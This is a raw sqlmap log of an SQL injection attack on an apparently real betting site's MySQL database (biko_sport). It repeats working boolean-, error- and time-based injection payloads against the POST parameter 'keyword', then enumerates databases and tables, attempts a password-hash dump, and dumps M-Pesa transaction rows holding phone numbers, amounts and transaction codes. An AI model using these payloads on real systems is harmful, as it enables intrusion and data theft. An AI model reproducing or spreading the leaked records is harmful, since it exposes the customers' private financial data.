- | wait_classes_global_by_avg_latency |
- | wait_classes_global_by_latency |
- | waits_by_host_by_latency |
- | waits_by_user_by_latency |
- | waits_global_by_latency |
- | x$host_summary |
- | x$host_summary_by_file_io |
- | x$host_summary_by_file_io_type |
- | x$host_summary_by_stages |
- | x$host_summary_by_statement_latency |
- | x$host_summary_by_statement_type |
- | x$innodb_buffer_stats_by_schema |
- | x$innodb_buffer_stats_by_table |
- | x$innodb_lock_waits |
- | x$io_by_thread_by_latency |
- | x$io_global_by_file_by_bytes |
- | x$io_global_by_file_by_latency |
- | x$io_global_by_wait_by_bytes |
- | x$io_global_by_wait_by_latency |
- | x$latest_file_io |
- | x$memory_by_host_by_current_bytes |
- | x$memory_by_thread_by_current_bytes |
- | x$memory_by_user_by_current_bytes |
- | x$memory_global_by_current_bytes |
- | x$memory_global_total |
- | x$processlist |
- | x$ps_digest_95th_percentile_by_avg_us |
- | x$ps_digest_avg_latency_distribution |
- | x$ps_schema_table_statistics_io |
- | x$schema_flattened_keys |
- | x$schema_index_statistics |
- | x$schema_table_lock_waits |
- | x$schema_table_statistics |
- | x$schema_table_statistics_with_buffer |
- | x$schema_tables_with_full_table_scans |
- | x$session |
- | x$statement_analysis |
- | x$statements_with_errors_or_warnings |
- | x$statements_with_full_table_scans |
- | x$statements_with_runtimes_in_95th_percentile |
- | x$statements_with_sorting |
- | x$statements_with_temp_tables |
- | x$user_summary |
- | x$user_summary_by_file_io |
- | x$user_summary_by_file_io_type |
- | x$user_summary_by_stages |
- | x$user_summary_by_statement_latency |
- | x$user_summary_by_statement_type |
- | x$wait_classes_global_by_avg_latency |
- | x$wait_classes_global_by_latency |
- | x$waits_by_host_by_latency |
- | x$waits_by_user_by_latency |
- | x$waits_global_by_latency |
- +-----------------------------------------------+
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: POST
- Parameter: keyword
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
- ---
- web application technology: PHP 5.6.33, Nginx
- back-end DBMS: MySQL 5.0
- current user: 'root@%'
- current user is DBA: False
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: POST
- Parameter: keyword
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
- ---
- web application technology: PHP 5.6.33, Nginx
- back-end DBMS: MySQL 5.0
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: POST
- Parameter: keyword
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
- ---
- web application technology: PHP 5.6.33, Nginx
- back-end DBMS: MySQL 5.0
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: POST
- Parameter: keyword
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
- ---
- web application technology: PHP 5.6.33, Nginx
- back-end DBMS: MySQL 5.0
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: POST
- Parameter: keyword
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
- ---
- web application technology: PHP 5.6.33, Nginx
- back-end DBMS: MySQL 5.0
- available databases [5]:
- [*] biko_sport
- [*] information_schema
- [*] mysql
- [*] performance_schema
- [*] sys
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: POST
- Parameter: keyword
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
- ---
- web application technology: PHP 5.6.33, Nginx
- back-end DBMS: MySQL 5.0
- Database: mysql
- [33 tables]
- +---------------------------+
- | system_user |
- | user |
- | columns_priv |
- | db |
- | engine_cost |
- | event |
- | func |
- | general_log |
- | gtid_executed |
- | heartbeat |
- | help_category |
- | help_keyword |
- | help_relation |
- | help_topic |
- | innodb_index_stats |
- | innodb_table_stats |
- | ndb_binlog_index |
- | plugin |
- | proc |
- | procs_priv |
- | proxies_priv |
- | server_cost |
- | servers |
- | slave_master_info |
- | slave_relay_log_info |
- | slave_worker_info |
- | slow_log |
- | tables_priv |
- | time_zone |
- | time_zone_leap_second |
- | time_zone_name |
- | time_zone_transition |
- | time_zone_transition_type |
- +---------------------------+
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: POST
- Parameter: keyword
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
- ---
- web application technology: PHP 5.6.33, Nginx
- back-end DBMS: MySQL 5.0
- Database: mysql
- Table: db
- [1 entry]
- +-----+-----------+-----------+-----------+------------+------------+------------+------------+-------------+-------------+-------------+-------------+-------------+--------------+--------------+----------------+-----------------+------------------+------------------+--------------------+---------------------+-----------------------+
- | Db | Host | `User` | Drop_priv | Grant_priv | Alter_priv | Index_priv | Event_priv | Create_priv | Insert_priv | Select_priv | Update_priv | Delete_priv | Execute_priv | Trigger_priv | Show_view_priv | References_priv | Create_view_priv | Lock_tables_priv | Alter_routine_priv | Create_routine_priv | Create_tmp_table_priv |
- +-----+-----------+-----------+-----------+------------+------------+------------+------------+-------------+-------------+-------------+-------------+-------------+--------------+--------------+----------------+-----------------+------------------+------------------+--------------------+---------------------+-----------------------+
- | sys | localhost | mysql.sys | N | N | N | N | N | N | N | N | N | N | N | Y | N | N | N | N | N | N | N |
- +-----+-----------+-----------+-----------+------------+------------+------------+------------+-------------+-------------+-------------+-------------+-------------+--------------+--------------+----------------+-----------------+------------------+------------------+--------------------+---------------------+-----------------------+
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: POST
- Parameter: keyword
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
- ---
- web application technology: PHP 5.6.33, Nginx
- back-end DBMS: MySQL 5.0
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: POST
- Parameter: keyword
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
- ---
- web application technology: PHP 5.6.33, Nginx
- back-end DBMS: MySQL 5.0
- available databases [5]:
- [*] biko_sport
- [*] information_schema
- [*] mysql
- [*] performance_schema
- [*] sys
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: POST
- Parameter: keyword
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
- ---
- web application technology: PHP 5.6.33, Nginx
- back-end DBMS: MySQL 5.0
- current user: 'root@%'
- database management system users password hashes:
- [*] mysql.sys [1]:
- password hash: NULL
- [*] root [1]:
- password hash: NULL
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: POST
- Parameter: keyword
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
- ---
- web application technology: PHP 5.6.33, Nginx
- back-end DBMS: MySQL 5.0
- Database: biko_sport
- [151 tables]
- +--------------------------+
- | SEQUENCE |
- | match |
- | transaction |
- | user |
- | account_freeze |
- | airtel_money |
- | airtel_money_rate |
- | airtel_subs_blast |
- | arch_live_match |
- | auth_assignment |
- | auth_item |
- | auth_item_child |
- | auth_rule |
- | backup_profile |
- | bb |
- | bet |
- | bet_discount |
- | bet_slip |
- | bet_slip_check |
- | bet_slip_temp |
- | bet_status_changes |
- | biko_point |
- | biko_point_bet |
- | biko_point_summary |
- | biko_point_trx |
- | biko_profile_names |
- | bleague_competition |
- | bleague_event_odd |
- | bleague_match |
- | bonus_bet |
- | bonus_bet_count |
- | bonus_trx |
- | card_summary |
- | category |
- | competition |
- | delivery_report |
- | early_bet_white_list |
- | event |
- | event_odd |
- | free_bet |
- | free_bet_transactions |
- | ga |
- | game |
- | game_ids |
- | game_request |
- | gr_profile_player |
- | gr_tickets |
- | inactive2_subs |
- | inactive_nums |
- | inactive_profile |
- | inbox |
- | jackpot_bet |
- | jackpot_event |
- | jackpot_match |
- | jackpot_trx |
- | jackpot_type |
- | jackpot_winner |
- | jp_bet_cancel_data |
- | jpbonus_award |
- | latest_alive |
- | live_match |
- | live_meta_history |
- | live_odds |
- | live_odds_change |
- | live_odds_meta |
- | ls_betmatch |
- | ls_card |
- | ls_category |
- | ls_city |
- | ls_country |
- | ls_goal |
- | ls_line_up |
- | ls_livescore_data |
- | ls_match_detail |
- | ls_player |
- | ls_referee |
- | ls_scores |
- | ls_sport |
- | ls_substitution |
- | ls_team |
- | ls_tournament |
- | ls_venue |
- | matchid |
- | menu |
- | migration |
- | missed_withdrawals |
- | mobile_app_profile |
- | mobile_app_version |
- | mpesa_rate |
- | mpesa_transaction |
- | msi |
- | mts_exception |
- | mts_ticket_submit |
- | mts_validation_code |
- | network_charge_range |
- | nums_pro |
- | odd_history |
- | odd_key_alias |
- | odd_type |
- | odds_history |
- | odds_subtype |
- | outbox |
- | outcome |
- | outcome_backup |
- | outcome_o |
- | outcome_old |
- | outcome_test |
- | outright |
- | outright_competitor |
- | outright_odd |
- | outright_odd_history |
- | outright_outcome |
- | paybill_tariff |
- | playground |
- | profile |
- | profile_balance |
- | profile_bonus |
- | profile_setting |
- | profile_settings |
- | recon_references |
- | reconciliation |
- | running_balance |
- | seven_aggregator_request |
- | shop_deposits |
- | shop_withdrawals |
- | speed_dial_history |
- | speed_dial_profile |
- | sport |
- | sqlmapfile |
- | talksport |
- | team |
- | ticket_settlement |
- | tournament |
- | traffic_analytic |
- | types |
- | user_bet_cancel |
- | ux_categories |
- | ux_todays_highlights |
- | virtual_competition |
- | virtual_event_odd |
- | virtual_latest_alive |
- | virtual_match |
- | virtual_odd_type |
- | virtual_odds |
- | virtual_odds_meta |
- | virtual_outcome |
- | virtual_sport |
- | void_bet_slip |
- | winner |
- | withdraw_references |
- | withdrawal |
- +--------------------------+
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: POST
- Parameter: keyword
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
- ---
- web application technology: PHP 5.6.33, Nginx
- back-end DBMS: MySQL 5.0
- Database: biko_sport
- Table: airtel_money
- [10 columns]
- +-------------------+---------------+
- | Column | Type |
- +-------------------+---------------+
- | account_no | varchar(100) |
- | airtel_money_code | varchar(50) |
- | amount | decimal(10,2) |
- | created | datetime |
- | first_name | varchar(120) |
- | id | bigint(20) |
- | last_name | varchar(120) |
- | modified | timestamp |
- | msisdn | varchar(30) |
- | time_stamp | datetime |
- +-------------------+---------------+
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: POST
- Parameter: keyword
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
- ---
- web application technology: PHP 5.6.33, Nginx
- back-end DBMS: MySQL 5.0
- Database: biko_sport
- Table: airtel_money
- [0 entries]
- +----+--------+--------+---------+----------+-----------+------------+------------+------------+-------------------+
- | id | msisdn | amount | created | modified | last_name | first_name | time_stamp | account_no | airtel_money_code |
- +----+--------+--------+---------+----------+-----------+------------+------------+------------+-------------------+
- +----+--------+--------+---------+----------+-----------+------------+------------+------------+-------------------+
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: POST
- Parameter: keyword
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
- ---
- web application technology: PHP 5.6.33, Nginx
- back-end DBMS: MySQL 5.0
- Database: biko_sport
- Table: SEQUENCE
- [2 columns]
- +-----------+---------------+
- | Column | Type |
- +-----------+---------------+
- | SEQ_COUNT | decimal(38,0) |
- | SEQ_NAME | varchar(50) |
- +-----------+---------------+
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: POST
- Parameter: keyword
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
- ---
- web application technology: PHP 5.6.33, Nginx
- back-end DBMS: MySQL 5.0
- Database: biko_sport
- Table: SEQUENCE
- [0 entries]
- +----------+-----------+
- | SEQ_NAME | SEQ_COUNT |
- +----------+-----------+
- +----------+-----------+
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: POST
- Parameter: keyword
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
- ---
- web application technology: PHP 5.6.33, Nginx
- back-end DBMS: MySQL 5.0
- Database: biko_sport
- Table: auth_assignment
- [3 columns]
- +------------+-------------+
- | Column | Type |
- +------------+-------------+
- | created_at | int(11) |
- | item_name | varchar(64) |
- | user_id | varchar(64) |
- +------------+-------------+
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: POST
- Parameter: keyword
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
- ---
- web application technology: PHP 5.6.33, Nginx
- back-end DBMS: MySQL 5.0
- Database: biko_sport
- Table: bb
- [12 columns]
- +--------------+---------------+
- | Column | Type |
- +--------------+---------------+
- | bet_amount | decimal(10,2) |
- | bet_id | int(11) |
- | bet_message | varchar(200) |
- | created | datetime |
- | created_by | varchar(70) |
- | modified | datetime |
- | possible_win | decimal(10,2) |
- | profile_id | bigint(20) |
- | reference | varchar(70) |
- | status | smallint(1) |
- | total_odd | decimal(10,2) |
- | win | tinyint(1) |
- +--------------+---------------+
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: POST
- Parameter: keyword
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
- ---
- web application technology: PHP 5.6.33, Nginx
- back-end DBMS: MySQL 5.0
- Database: biko_sport
- Table: mobile_app_profile
- [9 columns]
- +--------------+---------------------+
- | Column | Type |
- +--------------+---------------------+
- | app | varchar(120) |
- | date_created | datetime |
- | device_id | varchar(200) |
- | id | int(10) unsigned |
- | modified | timestamp |
- | msisdn | varchar(30) |
- | profile_id | bigint(20) unsigned |
- | status | int(11) |
- | token_id | varchar(200) |
- +--------------+---------------------+
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: POST
- Parameter: keyword
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
- ---
- web application technology: PHP 5.6.33, Nginx
- back-end DBMS: MySQL 5.0
- Database: biko_sport
- Table: mpesa_transaction
- [14 columns]
- +----------------------+---------------+
- | Column | Type |
- +----------------------+---------------+
- | account_no | varchar(100) |
- | business_number | int(8) |
- | created | datetime |
- | enc_params | varchar(250) |
- | message | varchar(300) |
- | modified | timestamp |
- | mpesa_amt | decimal(53,2) |
- | mpesa_code | varchar(100) |
- | mpesa_customer_id | varchar(50) |
- | mpesa_sender | varchar(100) |
- | mpesa_transaction_id | bigint(20) |
- | msisdn | bigint(20) |
- | promo_code | varchar(50) |
- | transaction_time | datetime |
- +----------------------+---------------+
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: POST
- Parameter: keyword
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
- ---
- web application technology: PHP 5.6.33, Nginx
- back-end DBMS: MySQL 5.0
- Database: biko_sport
- Table: mpesa_transaction
- [2 entries]
- +-------------------+----------------------+--------------+---------------------+-------------+---------------------+-----------+------------+------------+-------------+---------------+--------------+-----------------+---------------------+
- | mpesa_customer_id | mpesa_transaction_id | msisdn | created | message | modified | mpesa_amt | promo_code | enc_params | mpesa_code | account_no | mpesa_sender | business_number | transaction_time |
- +-------------------+----------------------+--------------+---------------------+-------------+---------------------+-----------+------------+------------+-------------+---------------+--------------+-----------------+---------------------+
- | +255756000915 | 5137 | 255756000915 | 2018-02-14 19:52:52 | 5BE8168ON1A | 2018-02-14 19:52:51 | 20000.00 | NULL | | 5BE8168ON1A | +255756000915 | | 7808353 | 2018-02-14 19:52:52 |
- | 000 | 315 | 255758400696 | 2018-02-04 12:06:17 | 5B4715GE41B | 2018-02-04 12:06:17 | 500.00 | NULL | | 5B4715GE41B | 000 | | 5607720 | 2018-02-04 12:06:17 |
- +-------------------+----------------------+--------------+---------------------+-------------+---------------------+-----------+------------+------------+-------------+---------------+--------------+-----------------+---------------------+
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: POST
- Parameter: keyword
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
- ---
- web application technology: PHP 5.6.33, Nginx
- back-end DBMS: MySQL 5.0
- Database: biko_sport
- Table: profile_balance
- [7 columns]
- +--------------------+---------------+
- | Column | Type |
- +--------------------+---------------+
- | balance | decimal(10,2) |
- | bonus_balance | decimal(10,2) |
- | created | datetime |
- | modified | timestamp |
- | profile_balance_id | int(10) |
- | profile_id | bigint(20) |
- | transaction_id | bigint(20) |
- +--------------------+---------------+
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: POST
- Parameter: keyword
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
- Type: AND/OR time-based blind
